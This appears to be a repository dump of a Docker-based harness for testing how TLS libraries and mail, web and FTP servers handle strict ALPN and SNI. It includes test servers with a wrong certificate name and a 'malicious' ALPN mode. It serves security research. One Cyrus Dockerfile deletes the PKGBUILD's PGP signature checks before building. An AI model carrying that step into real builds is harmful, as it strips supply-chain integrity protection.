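  if ! docker cp "$containerid:/results" results-temp; then
    echo "docker cp from $containerid failed" >&2
    echo "MISSING: docker cp failed" >> ../results
    return 1
  fi
  cat results-temp >> ../results
  rm -f results-temp
  return 0
}

# A broken build would otherwise run every test against stale images.
./build-everything.sh || { echo "build-everything.sh failed" >&2; exit 1; }

# go into every library folder
# 1. run containers and tests
# 2. get results file from docker container
# 3. append them to the results file on the host
rm -f results
for library in bearssl botan gnutls java golang mbedtls openssl wolfssl rustls; do
  (
    cd "$library" || exit 1
    ./run.sh
    collect_results "$library" "$(docker-compose ps -q "$library-client")"
  )
done

# boringssl is included in the openssl folder so we need to get the file manually.
# Subshell instead of cd/cd.. so a failed cd cannot leave us one level up.
(
  cd openssl || exit 1
  collect_results boringssl \
    "$(docker-compose -f docker-compose-boringssl.yml -p "boringssl" ps -q boringssl-client)"
)

cat results
# remove colors from output
sed -r "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" results > results-temp
mv results-temp results
--------------------------------------------------------------------------------
/evaluation-libraries/rustls/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "alpaca-rustls"
version = "0.0.1"
edition = "2018"
description = "Rustls example." 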
6 | publish = false 7 | 8 | [dependencies] 9 | rustls = "0.20.0" 10 | rustls-pemfile = "0.2.0" 11 | clap = "~2.27.0" 12 | mio = { version = "0.7", features = ["os-poll", "tcp"] } 13 | 14 | 15 | [[bin]] 16 | name = "server" 17 | path = "server/server.rs" 18 | 19 | [[bin]] 20 | name = "client" 21 | path = "client/client.rs" -------------------------------------------------------------------------------- /evaluation-libraries/rustls/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-rustls 3 | RUN apk add cargo 4 | WORKDIR /build 5 | ADD server /build/server 6 | ADD client /build/client 7 | ADD Cargo.toml /build/Cargo.toml 8 | RUN cargo build --release 9 | 10 | RUN mv /build/target/release/server /server 11 | RUN mv /build/target/release/client /client 12 | 13 | COPY --from=tls-openssl /openssl-client /openssl-client 14 | WORKDIR / 15 | CMD ["/server"] 16 | -------------------------------------------------------------------------------- /evaluation-libraries/rustls/README.md: -------------------------------------------------------------------------------- 1 | # rustls example with strict sni and strict alpn 2 | 3 | Tested with rustls 0.20.0 4 | 5 | based on https://github.com/rustls/rustls/blob/main/rustls-mio/examples/ 6 | 7 | needs tls-baseimage already in docker 8 | 9 | 10 | ```bash 11 | ./run.sh 12 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/rustls/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=0.20.0 . 
-t tls-rustls -f Dockerfile -------------------------------------------------------------------------------- /evaluation-libraries/rustls/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | rustls-server: 8 | image: tls-rustls 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | rustls-client: 16 | image: tls-rustls 17 | command: [ "./client.sh", "/client", "rustls-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - rustls-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn 22 | -------------------------------------------------------------------------------- /evaluation-libraries/rustls/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from rustls-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-wolfssl VERSION 0.1.0) 3 | 4 | add_subdirectory(client) 5 | add_subdirectory(server) 6 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-wolfssl 3 | ARG VERSION=4.8.1-stable 4 | WORKDIR /build 5 | RUN git clone --depth=1 --branch=v${VERSION} 
https://github.com/wolfSSL/wolfssl 6 | WORKDIR /build/wolfssl 7 | RUN ./autogen.sh 8 | RUN ./configure --prefix=/build/ --enable-static --enable-sni --enable-alpn 9 | RUN make 10 | WORKDIR /build 11 | ADD server /build/server 12 | ADD client /build/client 13 | ADD CMakeLists.txt /build/CMakeLists.txt 14 | RUN cmake . .. && make 15 | RUN mv /build/server/server / 16 | RUN mv /build/client/client / 17 | COPY --from=tls-openssl /openssl-client /openssl-client 18 | WORKDIR / 19 | CMD ["/server"] 20 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/README.md: -------------------------------------------------------------------------------- 1 | # wolfssl example with strict sni and strict alpn 2 | 3 | Tested with wolfssl 4.8.1-stable 4 | 5 | Based on https://github.com/wolfSSL/wolfssl-examples 6 | 7 | needs tls-baseimage already in docker 8 | 9 | 10 | ```bash 11 | ./run.sh 12 | ``` -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=4.8.1-stable . 
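 -t tls-wolfssl -f Dockerfile
--------------------------------------------------------------------------------
/evaluation-libraries/wolfssl/client/CMakeLists.txt:
--------------------------------------------------------------------------------
cmake_minimum_required(VERSION 3.0.0)
project(client VERSION 0.1.0)

add_library(wolfssl STATIC IMPORTED)
set_target_properties(wolfssl PROPERTIES
IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/wolfssl/src/.libs/libwolfssl.a"
INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/wolfssl"
)
add_executable(client client.c)
target_link_libraries(client wolfssl m)
target_compile_options(client PRIVATE -Wall -Wextra)
--------------------------------------------------------------------------------
/evaluation-libraries/wolfssl/client/client.h:
--------------------------------------------------------------------------------
/* Header names were lost in extraction; these are the ones the code below uses. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Open a TCP connection to hostname:port (port as the decimal string taken
 * from the command line) and return the connected socket descriptor.
 *
 * This is a test-harness helper, so resolution/connection failure is fatal and
 * terminates the process, as in the original. Changes from the original:
 *   - resolves with getaddrinfo() instead of the obsolete, non-thread-safe
 *     gethostbyname(), and tries every returned address rather than the first;
 *   - exits with status 1 (the original used exit(0)) when the host cannot be
 *     resolved, so a failed probe no longer reports success to client.sh;
 *   - never continues with an invalid descriptor when socket() fails, and
 *     closes descriptors of failed connect() attempts.
 * Still IPv4-only (AF_INET) and numeric-port-only (AI_NUMERICSERV mirrors the
 * original atoi()).
 */
int tcp_connect(const char *hostname, const char *port) {
    struct addrinfo hints;
    struct addrinfo *res = NULL;
    struct addrinfo *ai;
    int sockfd = -1;
    int rc;

    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_flags = AI_NUMERICSERV;

    rc = getaddrinfo(hostname, port, &hints, &res);
    if (rc != 0) {
        fprintf(stderr, "ERROR, no such host (%s)\n", gai_strerror(rc));
        exit(1);
    }

    for (ai = res; ai != NULL; ai = ai->ai_next) {
        sockfd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (sockfd < 0) {
            printf("ERROR opening socket");
            continue;
        }
        if (connect(sockfd, ai->ai_addr, ai->ai_addrlen) == 0) {
            break; /* connected */
        }
        close(sockfd);
        sockfd = -1;
    }
    freeaddrinfo(res);

    if (sockfd < 0) {
        fprintf(stderr, "Connect error\n");
        exit(1);
    }
    return sockfd;
}
--------------------------------------------------------------------------------
/evaluation-libraries/wolfssl/docker-compose.yml: 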
-------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | wolfssl-server: 8 | image: tls-wolfssl 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | wolfssl-client: 16 | image: tls-wolfssl 17 | command: [ "./client.sh", "/client", "wolfssl-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - wolfssl-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn 22 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from wolfssl-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(server VERSION 0.1.0) 3 | 4 | add_library(wolfssl STATIC IMPORTED) 5 | set_target_properties(wolfssl PROPERTIES 6 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/wolfssl/src/.libs/libwolfssl.a" 7 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/wolfssl" 8 | ) 9 | add_executable(server server.c) 10 | target_link_libraries(server wolfssl m) 11 | target_compile_options(server PRIVATE -Wall -Wextra) 12 | -------------------------------------------------------------------------------- /evaluation-libraries/wolfssl/server/server.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 
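#include 4 | #include 5 | #include 6 |
/*
 * Create an IPv4 TCP socket bound to INADDR_ANY:port and return it.
 *
 * SO_REUSEADDR is set so the test server can be restarted without waiting
 * for TIME_WAIT sockets to drain. listen() is not called here; presumably
 * the caller in server.c does that — confirm there.
 *
 * port: TCP port to bind, host byte order.
 *
 * Returns the bound socket descriptor, or -1 after printing the failing
 * call to stderr. Previously the results of socket(), setsockopt() and
 * bind() were all ignored: with the port already taken, the caller got an
 * unbound socket, and a later listen() would attach it to an arbitrary
 * ephemeral port, so the scanner would test the wrong endpoint or nothing.
 */
int create_socket(uint16_t port) {
  int listen_sd;
  struct sockaddr_in sa_serv;
  int optval = 1;

  listen_sd = socket(AF_INET, SOCK_STREAM, 0);
  if (listen_sd < 0) {
    perror("socket");
    return -1;
  }

  memset(&sa_serv, '\0', sizeof(sa_serv));
  sa_serv.sin_family = AF_INET;
  sa_serv.sin_addr.s_addr = INADDR_ANY;
  sa_serv.sin_port = htons(port);

  if (setsockopt(listen_sd, SOL_SOCKET, SO_REUSEADDR, (void *)&optval,
                 sizeof(int)) < 0) {
    perror("setsockopt(SO_REUSEADDR)");
    close(listen_sd);
    return -1;
  }

  if (bind(listen_sd, (struct sockaddr *)&sa_serv, sizeof(sa_serv)) < 0) {
    perror("bind");
    close(listen_sd);
    return -1;
  }

  return listen_sd;
}
-------------------------------------------------------------------------------- /evaluation-servers/.gitignore: -------------------------------------------------------------------------------- 1 | *tar.gz 2 | httpd-* 3 | nginx-* 4 | sendmail-* -------------------------------------------------------------------------------- /evaluation-servers/README.md: -------------------------------------------------------------------------------- 1 | # alpaca-server 2 | Testing TLS Servers ALPN and SNI Implementation. 3 | 4 | Scans each Server with TLS-Scanner https://github.com/tls-attacker/TLS-Scanner 5 | 6 | ## Requirements 7 | - docker and docker-compose 8 | - baseimage Docker containers from evaluation-libraries 9 | 10 | ---------------- 11 | ## Running Servers 12 | 1. Build the baseimage from evaluation-libraries. 13 | 2. Build the TLS-Scanner container with ``./build.sh`` 14 | 3. Go into any subdirectory and do ``./run.sh`` 15 | 16 | ## Server overview and versions tested 17 | 'strict' means the server rejects the connection if he doesn't recognize the ALPN or SNI sent. 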
18 | | Server | ALPN |SNI | 19 | | ------------- | ------------- | ------------- | 20 | | apache 2.4.51 | not strict | not strict | 21 | | nginx 1.21.4 | strict | not strict | 22 | | lighttpd 1.4.63 | strict | not strict | 23 | | postfix/smtpd 3.6.2 | ------------ | not strict | 24 | | openSMTPD 6.8.0 | ------------ | ------------ | 25 | | sendmail 8.17.1 | ------------ | ------------ | 26 | | exim 4.95 | strict | ------------ | 27 | | Courier 5.10 | strict | not strict | 28 | | Dovecot 2.3.13 | ------------ | not strict | 29 | | pure-ftpd 1.0.49 | ------------ | not strict | 30 | | cyrus 3.4.2-1 | strict in master only https | not strict | 31 | | ProFTPD 1.3.8rc2 | ------------ | strict | 32 | | vsftpd 3.0.5 | strict | strict | 33 | | filezilla server 1.1.0 | strict | not strict | 34 | 35 | 36 | -------------------------------------------------------------------------------- /evaluation-servers/apache/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM httpd:2.4.51 as tls-apache 2 | COPY ./apache.conf /usr/local/apache2/conf/httpd.conf 3 | COPY --from=tls-baseimage /etc/ssl/cert-data/tls-server.com-chain.crt /usr/local/apache2/conf/server-chain.crt 4 | COPY --from=tls-baseimage /etc/ssl/cert-data/tls-server.com.crt /usr/local/apache2/conf/server.crt 5 | COPY --from=tls-baseimage /etc/ssl/cert-data/tls-server.com.key /usr/local/apache2/conf/server.key -------------------------------------------------------------------------------- /evaluation-servers/apache/apache.conf: -------------------------------------------------------------------------------- 1 | LoadModule socache_shmcb_module modules/mod_socache_shmcb.so 2 | LoadModule authn_file_module modules/mod_authn_file.so 3 | LoadModule authn_core_module modules/mod_authn_core.so 4 | LoadModule authz_host_module modules/mod_authz_host.so 5 | LoadModule authz_groupfile_module modules/mod_authz_groupfile.so 6 | LoadModule authz_core_module modules/mod_authz_core.so 7 | 
LoadModule authz_user_module modules/mod_authz_user.so 8 | LoadModule reqtimeout_module modules/mod_reqtimeout.so 9 | LoadModule filter_module modules/mod_filter.so 10 | LoadModule mime_module modules/mod_mime.so 11 | LoadModule env_module modules/mod_env.so 12 | LoadModule setenvif_module modules/mod_setenvif.so 13 | LoadModule version_module modules/mod_version.so 14 | LoadModule unixd_module modules/mod_unixd.so 15 | LoadModule headers_module modules/mod_headers.so 16 | LoadModule mpm_event_module modules/mod_mpm_event.so 17 | LoadModule log_config_module modules/mod_log_config.so 18 | LoadModule ssl_module modules/mod_ssl.so 19 | LoadModule status_module modules/mod_status.so 20 | LoadModule dir_module modules/mod_dir.so 21 | LoadModule alias_module modules/mod_alias.so 22 | LoadModule autoindex_module modules/mod_autoindex.so 23 | LoadModule http2_module modules/mod_http2.so 24 | Include conf/extra/httpd-ssl.conf 25 | 26 | 27 | User daemon 28 | Group daemon 29 | 30 | 31 | ServerRoot "/usr/local/apache2" 32 | ServerName tls-server:4433 33 | 34 | SSLProtocol +TLSv1.2 +TLSv1.3 35 | 36 | Listen 4433 37 | 38 | Protocols h2 http/1.1 39 | DocumentRoot "/usr/local/apache2/htdocs" 40 | ServerName tls-server 41 | SSLEngine on 42 | SSLCertificateFile /usr/local/apache2/conf/server.crt 43 | SSLCertificateKeyFile /usr/local/apache2/conf/server.key 44 | SSLCertificateChainFile /usr/local/apache2/conf/server-chain.crt 45 | 46 | -------------------------------------------------------------------------------- /evaluation-servers/apache/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
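-t tls-apache 2 | -------------------------------------------------------------------------------- /evaluation-servers/apache/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | httpd: 8 | image: tls-apache 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - httpd 13 | command: [ "-connect", "httpd:4433", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] 14 | -------------------------------------------------------------------------------- /evaluation-servers/apache/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/build.sh: --------------------------------------------------------------------------------
#!/usr/bin/env bash
# Build the "tlsscanner" image that every evaluation-servers/*/docker-compose.yml
# runs against its server.
#
# Environment:
#   TLS_SCANNER_REF  optional git ref (tag or commit) to check out after cloning.
#                    Unset, the default, keeps the original behaviour of building
#                    whatever upstream HEAD is at clone time — two runs on
#                    different days can then scan with different scanner
#                    versions, so pin it when results must be reproducible.
set -euo pipefail

readonly repo_url=https://github.com/tls-attacker/TLS-Scanner.git
readonly checkout_dir=TLS-Scanner

# Reuse an existing clone on re-runs instead of letting a second clone fail.
# With set -e, a clone that fails for any other reason stops the script here;
# previously the unchecked cd then ran "docker build ." in evaluation-servers
# itself, i.e. the wrong directory.
if [[ ! -d "$checkout_dir/.git" ]]; then
  git clone "$repo_url" "$checkout_dir"
fi
cd "$checkout_dir" || exit 1
if [[ -n "${TLS_SCANNER_REF:-}" ]]; then
  git checkout "$TLS_SCANNER_REF"
fi
git submodule update --init --recursive
docker build . -t tlsscanner
-------------------------------------------------------------------------------- /evaluation-servers/courier/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage-archlinux 2 | 3 | # Avoid ERROR: invoke-rc.d: policy-rc.d denied execution of start. 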
4 | #RUN echo "#!/bin/sh\nexit 0" > /usr/sbin/policy-rc.d 5 | 6 | RUN pacman -Syu --noconfirm 7 | 8 | USER build 9 | 10 | ## Version 1.1.5-2 11 | 12 | WORKDIR /src/ 13 | RUN git clone https://aur.archlinux.org/courier-unicode.git 14 | WORKDIR /src/courier-unicode 15 | RUN git checkout b08066fde2b4147076cb3201888fc2ee68eed19c 16 | RUN makepkg -si --noconfirm 17 | 18 | WORKDIR /src/ 19 | RUN git clone https://aur.archlinux.org/courier-authlib.git 20 | WORKDIR /src/courier-authlib 21 | RUN git checkout 125c9823c551500428857a503f2d4a3b795aa589 22 | RUN makepkg -si --noconfirm 23 | 24 | WORKDIR /src/ 25 | RUN git clone https://aur.archlinux.org/courier-mta.git 26 | WORKDIR /src/courier-mta 27 | RUN git checkout 359ca3946091a4634d1c6aab60df2e079cdde08 28 | RUN makepkg -si --noconfirm 29 | 30 | USER root 31 | #ARG DEBIAN_FRONTEND=noninteractive 32 | #RUN apt-get update && apt-get install -yq courier-imap 33 | RUN cp /etc/ssl/cert-data/tls-server.com-chain.crt /etc/courier/imapd.cert 34 | RUN cp /etc/ssl/cert-data/tls-server.com-chain.crt /etc/courier/pop3d.cert 35 | RUN cp /etc/ssl/cert-data/tls-server.com.key /etc/courier/imapd.key 36 | RUN cp /etc/ssl/cert-data/tls-server.com.key /etc/courier/pop3d.key 37 | ADD start.sh /root/ 38 | ADD imapd-ssl /etc/courier/ 39 | RUN chmod +x /root/start.sh 40 | CMD ["/root/start.sh"] -------------------------------------------------------------------------------- /evaluation-servers/courier/build.sh: -------------------------------------------------------------------------------- 1 | docker build . 
-t tls-courier 2 | 3 | -------------------------------------------------------------------------------- /evaluation-servers/courier/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | courier: 8 | image: tls-courier 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - courier 13 | command: [ "-connect", "courier:993", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/courier/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/courier/smtpd.conf: -------------------------------------------------------------------------------- 1 | # $OpenBSD: smtpd.conf,v 1.10 2018/05/24 11:40:17 gilles Exp $ 2 | 3 | # This is the smtpd server system-wide configuration file. 4 | # See smtpd.conf(5) for more information. 
5 | 6 | table aliases file:/etc/aliases 7 | 8 | pki tls-server.com cert "/etc/ssl/cert-data/tls-server.com-chain.crt" 9 | pki tls-server.com key "/etc/ssl/cert-data/tls-server.com.key" 10 | 11 | # To accept external mail, replace with: listen on all 12 | # 13 | #listen on 0.0.0.0 smtps 14 | 15 | listen on 0.0.0.0 tls pki tls-server.com 16 | listen on 0.0.0.0 port 465 smtps pki tls-server.com 17 | listen on 0.0.0.0 port 587 tls-require pki tls-server.com 18 | 19 | action "local" maildir alias 20 | action "relay" relay 21 | 22 | # Uncomment the following to accept external mail for domain "example.org" 23 | # 24 | # match from any for domain "example.org" action "local" 25 | match for local action "local" 26 | match from local for any action "relay" -------------------------------------------------------------------------------- /evaluation-servers/courier/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | mkdir -p /run/courier/authdaemon 3 | touch /run/courier/authdaemon/pid.lock 4 | touch /run/courier/imapd-ssl.pid.lock 5 | makeimapaccess 6 | /usr/sbin/authdaemond start 7 | /usr/sbin/imapd start 8 | /usr/sbin/imapd-ssl start 9 | while true; do sleep 1000; done -------------------------------------------------------------------------------- /evaluation-servers/cyrus/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage-archlinux 2 | 3 | RUN pacman -Syu --noconfirm 4 | 5 | USER build 6 | 7 | #Fixed to Version 3.4.2 8 | 9 | WORKDIR /src/ 10 | RUN git clone https://aur.archlinux.org/perl-pod-pom.git 11 | WORKDIR /src/perl-pod-pom 12 | RUN git checkout 2699d4b77c2fb0573b1445968afaca4aa36299d4 13 | RUN makepkg -si --noconfirm 14 | 15 | WORKDIR /src/ 16 | RUN git clone https://aur.archlinux.org/perl-pod-pom-view-restructured.git 17 | WORKDIR /src/perl-pod-pom-view-restructured 18 | RUN git checkout 80138742fbb711e3a56b4018ce4dcc7f0ec1b212 19 | RUN 
makepkg -si --noconfirm 20 | 21 | WORKDIR /src/ 22 | RUN git clone https://aur.archlinux.org/cyrus-imapd.git 23 | WORKDIR /src/cyrus-imapd 24 | RUN git checkout a1e53ee172fc37431080dd3ff3685ffd2a2378e5 25 | #remove pgp key from PKGBUILD 26 | RUN sed -i '/^validpgpkeys/d' PKGBUILD 27 | RUN sed -i 's/{,.sig}//g' PKGBUILD 28 | RUN sed -i '/'SKIP'/d' PKGBUILD 29 | RUN makepkg -si --noconfirm 30 | 31 | USER root 32 | 33 | RUN echo "tls-server" >> /etc/hostname 34 | RUN echo "tls-server 127.0.0.1" >> /etc/hosts 35 | 36 | ADD cyrus.conf /etc/cyrus/cyrus.conf 37 | ADD imapd.conf /etc/cyrus/imapd.conf 38 | 39 | CMD ["/usr/lib/cyrus/master"] 40 | 41 | -------------------------------------------------------------------------------- /evaluation-servers/cyrus/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-cyrus 2 | 3 | -------------------------------------------------------------------------------- /evaluation-servers/cyrus/cyrus.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP PUBLIC KEY BLOCK----- 2 | 3 | mQENBFU5pZUBCAC+m05W9nJnBkrfFO9I+iimF1WCsSZNFoASJ3WEeZxIkOQO9BZj 4 | aKf8EP/nK7nEfNGZ2m+OrAtQU/+I8Sk1ppHuwZgENLvRzLsBGbv80kDKBw31Nd1f 5 | sCpVQs4b8zlohXjq0UN8tT5NcGJnGE7ahoOHzJk/0Ll76oVmOZvSw+WHBp1945m2 6 | Q8CbIbfmyuv7NF6GtGDVilPeIPsDnh5w5usjpKsxjYHKpy6Rtf4MbcCLtkRbHFra 7 | KJD+xum0PgPdCAEEbQsSXQgwOd0TZ59avRVVef674PjWqIuudUGUhJ/f9OWOj7LG 8 | 6QgJR6yvCy7Bc2eAN4RnIIzaUZGaJDKDCNozABEBAAG0ImVsbGllIHRpbW9uZXkg 9 | PGVsbGllQGZhc3RtYWlsLmNvbT6JATgEEwECACIFAlU5pZUCGwMGCwkIBwMCBhUI 10 | AgkKCwQWAgMBAh4BAheAAAoJEFVPBP6zY3jgb9gH/3GPDLGybo7SYZMtBmfe+Udf 11 | tcRkTtH+o2pf2rh6KwPhhEDuOXWVCIUPWXsWIVU2K5Y8AdBIHOEoSUp3n8juV57I 12 | u9CfDI718/WaHgEpYrq5DqyROAFr+sGahcb6C40+V/CeUSAmKVhFGniuALUSAQ+B 13 | XVj/i2EAFNg/5ALkPYDnDYDqm7Ak6odDbktYQz987y38sg3EMC/2wi2EoOG1VWeG 14 | twFD8HKmXZw+u6cYtFh9K1hOBZm+PhLHr3h1MHTuWYeBKkT3YqaGtXMwi704LlNr 15 | 
HU8beOHSNBSsVYJ61B4kgBA7p+qnx6xIpU2KfAJl8cgjCYwrq8yo+Lm9TazagfM= 16 | =dIwC 17 | -----END PGP PUBLIC KEY BLOCK----- -------------------------------------------------------------------------------- /evaluation-servers/cyrus/cyrus.conf: -------------------------------------------------------------------------------- 1 | # standard standalone server implementation 2 | 3 | START { 4 | # do not delete this entry! 5 | recover cmd="ctl_cyrusdb -r" 6 | } 7 | 8 | # UNIX sockets start with a slash and are put into /run/cyrus/socket 9 | SERVICES { 10 | # add or remove based on preferences 11 | imap cmd="imapd" listen="imap" prefork=0 12 | imaps cmd="imapd -s" listen="imaps" prefork=0 13 | #pop3 cmd="pop3d" listen="pop3" prefork=0 14 | #pop3s cmd="pop3d -s" listen="pop3s" prefork=0 15 | sieve cmd="timsieved" listen="sieve" prefork=0 16 | 17 | # these are only necessary if receiving/exporting usenet via NNTP 18 | # nntp cmd="nntpd" listen="nntp" prefork=0 19 | # nntps cmd="nntpd -s" listen="nntps" prefork=0 20 | 21 | # these are only necessary if using HTTP for CalDAV, CardDAV, or RSS 22 | #http cmd="httpd" listen="http" prefork=0 23 | https cmd="httpd -s" listen="https" prefork=0 24 | 25 | # at least one LMTP is required for delivery 26 | # lmtp cmd="lmtpd" listen="lmtp" prefork=0 27 | lmtpunix cmd="lmtpd" listen="/run/cyrus/socket/lmtp" prefork=0 28 | 29 | # this is requied if using socketmap 30 | # smmap cmd="smmapd" listen="/run/cyrus/socket/smmap" prefork=0 31 | 32 | # this is required if using notifications 33 | # notify cmd="notifyd" listen="/run/cyrus/socket/notify" proto="udp" prefork=1 34 | } 35 | 36 | EVENTS { 37 | # this is required 38 | checkpoint cmd="ctl_cyrusdb -c" period=30 39 | 40 | # this is only necessary if using duplicate delivery suppression, 41 | # Sieve or NNTP 42 | delprune cmd="cyr_expire -E 3" at=0400 43 | 44 | # Expire data older than 28 days. 
45 | deleteprune cmd="cyr_expire -E 4 -D 28" at=0430 46 | expungeprune cmd="cyr_expire -E 4 -X 28" at=0445 47 | 48 | # this is only necessary if caching TLS sessions 49 | tlsprune cmd="tls_prune" at=0400 50 | } 51 | 52 | DAEMON { 53 | # this is only necessary if using idled for IMAP IDLE 54 | # idled cmd="idled" 55 | } -------------------------------------------------------------------------------- /evaluation-servers/cyrus/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | cyrus: 8 | image: tls-cyrus 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - cyrus 13 | command: [ "-connect", "cyrus:993", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/cyrus/imapd.conf: -------------------------------------------------------------------------------- 1 | # Suggested minimal imapd.conf 2 | # See imapd.conf(5) for more information and more options 3 | 4 | # Space-separated users who have admin rights for all services. 5 | # NB: THIS MUST BE CONFIGURED 6 | admins: cyrus 7 | 8 | ################################################################### 9 | ## File, socket and DB location settings. 10 | ################################################################### 11 | 12 | # Configuration directory 13 | configdirectory: /var/lib/cyrus 14 | 15 | # Directories for proc and lock files 16 | proc_path: /run/cyrus/proc 17 | mboxname_lockpath: /run/cyrus/lock 18 | 19 | # Locations for DB files 20 | # The following DB are recreated upon initialization, so should live in 21 | # ephemeral storage for best performance. 
22 | duplicate_db_path: /run/cyrus/deliver.db 23 | ptscache_db_path: /run/cyrus/ptscache.db 24 | statuscache_db_path: /run/cyrus/statuscache.db 25 | tls_sessions_db_path: /run/cyrus/tls_sessions.db 26 | 27 | # Which partition to use for default mailboxes 28 | defaultpartition: default 29 | partition-default: /var/spool/cyrus/mail 30 | 31 | # If sieveusehomedir is false (the default), this directory is searched 32 | # for Sieve scripts. 33 | sievedir: /var/spool/sieve 34 | 35 | ################################################################### 36 | ## Important: KEEP THESE IN SYNC WITH cyrus.conf 37 | ################################################################### 38 | 39 | lmtpsocket: /run/cyrus/socket/lmtp 40 | idlesocket: /run/cyrus/socket/idle 41 | notifysocket: /run/cyrus/socket/notify 42 | 43 | # Syslog prefix. Defaults to cyrus (so logging is done as cyrus/imap 44 | # etc.) 45 | syslog_prefix: cyrus 46 | 47 | ################################################################### 48 | ## Server behaviour settings 49 | ################################################################### 50 | 51 | # Space-separated list of HTTP modules that will be enabled in 52 | # httpd(8). This option has no effect on modules that are disabled at 53 | # compile time due to missing dependencies (e.g. libical). 54 | # 55 | # Allowed values: caldav, carddav, domainkey, ischedule, rss 56 | httpmodules: caldav carddav 57 | 58 | # If enabled, the partitions will also be hashed, in addition to the 59 | # hashing done on configuration directories. This is recommended if one 60 | # partition has a very bushy mailbox tree. 
61 | hashimapspool: true 62 | 63 | # Enable virtual domains 64 | # and set default domain to localhost 65 | virtdomains: yes 66 | defaultdomain: tls-server 67 | 68 | # Use these credentials to run services 69 | cyrus_user: cyrus 70 | cyrus_group: mail 71 | 72 | ################################################################### 73 | ## User experience settings 74 | ################################################################### 75 | 76 | # Minimum time between POP mail fetches in minutes 77 | popminpoll: 1 78 | 79 | ################################################################### 80 | ## User Authentication settings 81 | ################################################################### 82 | 83 | # Allow plaintext logins by default (SASL PLAIN) 84 | allowplaintext: no 85 | 86 | ################################################################### 87 | ## SASL library options (these are handled directly by the SASL 88 | ## libraries, refer to SASL documentation for an up-to-date list of 89 | ## these) 90 | ################################################################### 91 | 92 | # The mechanism(s) used by the server to verify plaintext passwords. 93 | # Possible values are "saslauthd", 